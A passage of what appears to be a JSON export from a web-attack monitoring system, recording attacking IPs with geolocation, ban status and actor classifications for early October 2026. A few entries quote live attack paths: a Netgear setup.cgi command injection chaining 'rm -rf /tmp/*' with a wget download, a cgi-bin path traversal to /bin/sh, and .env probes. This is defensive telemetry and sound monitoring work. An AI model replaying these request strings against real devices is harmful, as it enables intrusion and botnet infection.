   "org": "CNServer LLC",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T00:31:00+02:00",
   "last_seen": "2026-10-05T00:31:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "146.190.103.103",
   "country": "Singapore",
   "cc": "SG",
   "city": "Singapore (Pioneer)",
   "lat": 1.32123,
   "lon": 103.695,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": "d3ecc9518c.scan.leakix.org",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T00:57:00+02:00",
   "last_seen": "2026-10-05T00:57:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS d3ecc9518c.scan.leakix.org"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "154.217.245.253",
   "country": "United States",
   "cc": "US",
   "city": "Los Angeles",
   "lat": 34.0549,
   "lon": -118.243,
   "asn": 400619,
   "org": "AROSSCLOUD INC.",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T23:40:00+02:00",
   "last_seen": "2026-10-04T23:40:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "167.99.249.21",
   "country": "Germany",
   "cc": "DE",
   "city": "Frankfurt am Main",
   "lat": 50.1109,
   "lon": 8.68213,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-04T19:39:00+02:00",
   "last_seen": "2026-10-04T19:39:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "168.228.151.152",
   "country": "Brazil",
   "cc": "BR",
   "city": "Mina\u00e7u",
   "lat": -13.5328,
   "lon": -48.2196,
   "asn": 264953,
   "org": "INTEGRATO TELECOMUNICA\u00c7\u00d5ES LTDA - ME",
   "ptr": "host-152.integrato.net.br",
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T18:07:00+02:00",
   "last_seen": "2026-10-04T18:07:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [],
   "paths": [
    "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"
   ],
   "actor": {
    "label": "Suspected Mirai-style IoT botnet",
    "confidence": "medium",
    "evidence": [
     "IoT/router exploit path with a downloader typical of Mirai-family loaders"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "175.148.158.44",
   "country": "China",
   "cc": "CN",
   "city": "Shenyang",
   "lat": 41.8048,
   "lon": 123.433,
   "asn": 4837,
   "org": "CHINA UNICOM China169 Backbone",
   "ptr": null,
   "types": [
    "command-injection"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T23:25:00+02:00",
   "last_seen": "2026-10-04T23:25:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [],
   "paths": [
    "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//175.148.158.44:\u2026"
   ],
   "actor": {
    "label": "Suspected Mirai-style IoT botnet",
    "confidence": "medium",
    "evidence": [
     "IoT/router exploit path with a downloader typical of Mirai-family loaders"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "178.128.151.198",
   "country": "United States",
   "cc": "US",
   "city": "North Bergen",
   "lat": 40.8054,
   "lon": -74.0241,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-04T22:19:00+02:00",
   "last_seen": "2026-10-04T22:19:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-05"
   ]
  },
  {
   "ip": "178.211.139.240",
   "country": "Poland",
   "cc": "PL",
   "city": "Warsaw (Mokot\u00f3w)",
   "lat": 52.1957,
   "lon": 20.9921,
   "asn": 201814,
   "org": "MEVSPACE sp. z o.o.",
   "ptr": null,
   "types": [
    "php-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T22:37:00+02:00",
   "last_seen": "2026-10-04T22:37:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "184.105.247.195",
   "country": "United States",
   "cc": "US",
   "city": "Fremont (East Industrial)",
   "lat": 37.49,
   "lon": -121.931,
   "asn": 6939,
   "org": "Hurricane Electric LLC",
   "ptr": "scan-14.shadowserver.io",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-05T05:36:00+02:00",
   "last_seen": "2026-10-05T05:36:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS scan-14.shadowserver.io"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "184.105.247.252",
   "country": "United States",
   "cc": "US",
   "city": "Fremont (East Industrial)",
   "lat": 37.49,
   "lon": -121.931,
   "asn": 6939,
   "org": "Hurricane Electric LLC",
   "ptr": "scan-21b.shadowserver.io",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T02:50:00+02:00",
   "last_seen": "2026-10-05T02:50:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS scan-21b.shadowserver.io"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "184.154.245.42",
   "country": "United States",
   "cc": "US",
   "city": "Miami",
   "lat": 25.7617,
   "lon": -80.1918,
   "asn": 398991,
   "org": "X99",
   "ptr": "mia-184-154-245-42.ip4.99.network",
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T02:19:00+02:00",
   "last_seen": "2026-10-05T02:19:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "185.226.197.69",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3676,
   "lon": 4.90414,
   "asn": 21859,
   "org": "Zenlayer Inc",
   "ptr": "zl-amsc-nl-gp6-wk117c.internet-census.org",
   "types": [
    "cms-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T18:48:00+02:00",
   "last_seen": "2026-10-04T18:48:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS zl-amsc-nl-gp6-wk117c.internet-census.org"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "186.182.105.49",
   "country": "Paraguay",
   "cc": "PY",
   "city": "Ciudad del Este",
   "lat": -25.5036,
   "lon": -54.6507,
   "asn": 11664,
   "org": "Techtel LMDS Comunicaciones Interactivas S.A.",
   "ptr": "host49.186-182-105.in-addr.arpa.claro.com.py",
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T00:33:00+02:00",
   "last_seen": "2026-10-05T00:33:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [],
   "tags": [
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-06"
   ]
  },
  {
   "ip": "187.108.1.142",
   "country": "Brazil",
   "cc": "BR",
   "city": "Joinville",
   "lat": -26.3044,
   "lon": -48.8464,
   "asn": 28267,
   "org": "SIM INTERNET PROVEDORES DE INTERNET EIRELI.",
   "ptr": "as28267.sc.simfibra.com.br",
   "types": [
    "attack-tool"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T19:57:00+02:00",
   "last_seen": "2026-10-04T19:57:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Automated attack tool",
    "confidence": "low",
    "evidence": [
     "request carried a known attack-tool user agent"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-05",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "187.17.228.218",
   "country": "Brazil",
   "cc": "BR",
   "city": "Joinville",
   "lat": -26.3044,
   "lon": -48.8464,
   "asn": 28267,
   "org": "SIM INTERNET PROVEDORES DE INTERNET EIRELI.",
   "ptr": "as28267.sc.simfibra.com.br",
   "types": [
    "php-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T00:14:00+02:00",
   "last_seen": "2026-10-05T00:14:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "187.87.144.234",
   "country": "Brazil",
   "cc": "BR",
   "city": "Mogi das Cruzes",
   "lat": -23.5394,
   "lon": -46.2167,
   "asn": 262686,
   "org": "Netwalk Telecomunica\u00e7\u00f5es em Inf. Ltda",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T19:14:00+02:00",
   "last_seen": "2026-10-04T19:14:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "multi-night"
   ],
   "paths": [
    "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"
   ],
   "actor": {
    "label": "Suspected Mirai-style IoT botnet",
    "confidence": "medium",
    "evidence": [
     "IoT/router exploit path with a downloader typical of Mirai-family loaders"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-07"
   ]
  },
  {
   "ip": "192.3.245.183",
   "country": "United States",
   "cc": "US",
   "city": "Los Angeles",
   "lat": 34.0549,
   "lon": -118.243,
   "asn": 36352,
   "org": "HostPapa",
   "ptr": "192-3-245-183-host.colocrossing.com",
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T22:07:00+02:00",
   "last_seen": "2026-10-04T22:07:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-05"
   ]
  },
  {
   "ip": "193.47.62.168",
   "country": "Andorra",
   "cc": "AD",
   "city": "Andorra la Vella",
   "lat": 42.5063,
   "lon": 1.52184,
   "asn": 216014,
   "org": "BestDC Limited",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T01:07:00+02:00",
   "last_seen": "2026-10-05T01:07:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "195.178.110.159",
   "country": "Andorra",
   "cc": "AD",
   "city": "Andorra la Vella",
   "lat": 42.5063,
   "lon": 1.52184,
   "asn": 48090,
   "org": "TECHOFF SRV LIMITED",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T23:19:00+02:00",
   "last_seen": "2026-10-04T23:19:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "cluster:195.178.110.0/24"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS48090 TECHOFF SRV (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "2 addresses from 195.178.110.0/24 (AS48090) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "195.178.110.199",
   "country": "Andorra",
   "cc": "AD",
   "city": "Andorra la Vella",
   "lat": 42.5063,
   "lon": 1.52184,
   "asn": 48090,
   "org": "TECHOFF SRV LIMITED",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T22:55:00+02:00",
   "last_seen": "2026-10-04T22:55:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "cluster:195.178.110.0/24",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS48090 TECHOFF SRV (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "2 addresses from 195.178.110.0/24 (AS48090) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-07"
   ]
  },
  {
   "ip": "196.189.236.67",
   "country": "Ethiopia",
   "cc": "ET",
   "city": "Addis Ababa",
   "lat": 9.02427,
   "lon": 38.7519,
   "asn": 24757,
   "org": "EthioNet",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T21:39:00+02:00",
   "last_seen": "2026-10-04T21:39:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-05"
   ]
  },
  {
   "ip": "2.56.172.206",
   "country": "Poland",
   "cc": "PL",
   "city": "Warsaw",
   "lat": 52.2297,
   "lon": 21.0122,
   "asn": 203273,
   "org": "NetCrafters OU",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T21:45:00+02:00",
   "last_seen": "2026-10-04T21:45:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "20.204.16.15",
   "country": "India",
   "cc": "IN",
   "city": "Pune",
   "lat": 18.5204,
   "lon": 73.8567,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T20:46:00+02:00",
   "last_seen": "2026-10-04T20:46:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [
    "/.env.local"
   ],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "20.210.186.186",
   "country": "Japan",
   "cc": "JP",
   "city": "Osaka",
   "lat": 34.6937,
   "lon": 135.502,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "php-probe"
   ],
   "bans": 1,
   "max_offence": 4,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-05T05:51:00+02:00",
   "last_seen": "2026-10-05T05:51:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-04",
    "2026-10-05"
   ]
  },
  {
   "ip": "20.249.5.100",
   "country": "South Korea",
   "cc": "KR",
   "city": "Yongsan-dong",
   "lat": 37.5503,
   "lon": 126.997,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "credential-probe"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-05T00:44:00+02:00",
   "last_seen": "2026-10-05T00:44:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "206.189.233.36",
   "country": "United States",
   "cc": "US",
   "city": "North Bergen",
   "lat": 40.8054,
   "lon": -74.0241,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": "a957d52272.scan.leakix.org",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T00:57:00+02:00",
   "last_seen": "2026-10-05T00:57:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS a957d52272.scan.leakix.org"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "209.99.187.10",
   "country": "United States",
   "cc": "US",
   "city": "San Francisco",
   "lat": 37.7749,
   "lon": -122.419,
   "asn": 402253,
   "org": "SKN Subnet & Telecom Ltd",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T20:55:00+02:00",
   "last_seen": "2026-10-04T20:55:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1"
   ],
   "paths": [],
   "actor": {
    "label": "Known-bad scanning infrastructure",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "216.126.237.47",
   "country": "United States",
   "cc": "US",
   "city": "Ogden",
   "lat": 41.223,
   "lon": -111.974,
   "asn": 14956,
   "org": "RouterHosting LLC",
   "ptr": "47.237.126.216.static.cloudzy.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T18:10:00+02:00",
   "last_seen": "2026-10-04T18:10:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-07"
   ]
  },
  {
   "ip": "221.159.119.6",
   "country": "South Korea",
   "cc": "KR",
   "city": "Seongnam-si (Jeongja-dong)",
   "lat": 37.3644,
   "lon": 127.116,
   "asn": 4766,
   "org": "Korea Telecom",
   "ptr": null,
   "types": [
    "command-injection"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T02:25:00+02:00",
   "last_seen": "2026-10-05T02:25:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "34.14.216.183",
   "country": "India",
   "cc": "IN",
   "city": "Mumbai",
   "lat": 18.9582,
   "lon": 72.832,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "183.216.14.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T18:11:00+02:00",
   "last_seen": "2026-10-04T18:11:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "34.140.234.80",
   "country": "Belgium",
   "cc": "BE",
   "city": "Brussels",
   "lat": 50.8476,
   "lon": 4.35717,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "80.234.140.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T01:07:00+02:00",
   "last_seen": "2026-10-05T01:07:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "34.142.253.246",
   "country": "Singapore",
   "cc": "SG",
   "city": "Singapore",
   "lat": 1.35208,
   "lon": 103.82,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "246.253.142.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T20:06:00+02:00",
   "last_seen": "2026-10-04T20:06:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "34.176.225.3",
   "country": "Chile",
   "cc": "CL",
   "city": "Santiago",
   "lat": -33.4489,
   "lon": -70.6693,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "3.225.176.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T02:53:00+02:00",
   "last_seen": "2026-10-05T02:53:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "34.18.32.39",
   "country": "Qatar",
   "cc": "QA",
   "city": "Doha",
   "lat": 25.2854,
   "lon": 51.531,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "39.32.18.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T01:12:00+02:00",
   "last_seen": "2026-10-05T01:12:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "34.186.110.67",
   "country": "United States",
   "cc": "US",
   "city": "Washington D.C.",
   "lat": 38.9072,
   "lon": -77.0369,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "67.110.186.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T23:51:00+02:00",
   "last_seen": "2026-10-04T23:51:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "34.22.106.197",
   "country": "South Korea",
   "cc": "KR",
   "city": "Yongsan-dong",
   "lat": 37.5503,
   "lon": 126.997,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "197.106.22.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T19:45:00+02:00",
   "last_seen": "2026-10-04T19:45:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "34.22.117.21",
   "country": "Belgium",
   "cc": "BE",
   "city": "Brussels",
   "lat": 50.8476,
   "lon": 4.35717,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "21.117.22.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-05T02:28:00+02:00",
   "last_seen": "2026-10-05T02:28:00+02:00",
   "sensors": [
    "web-1"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
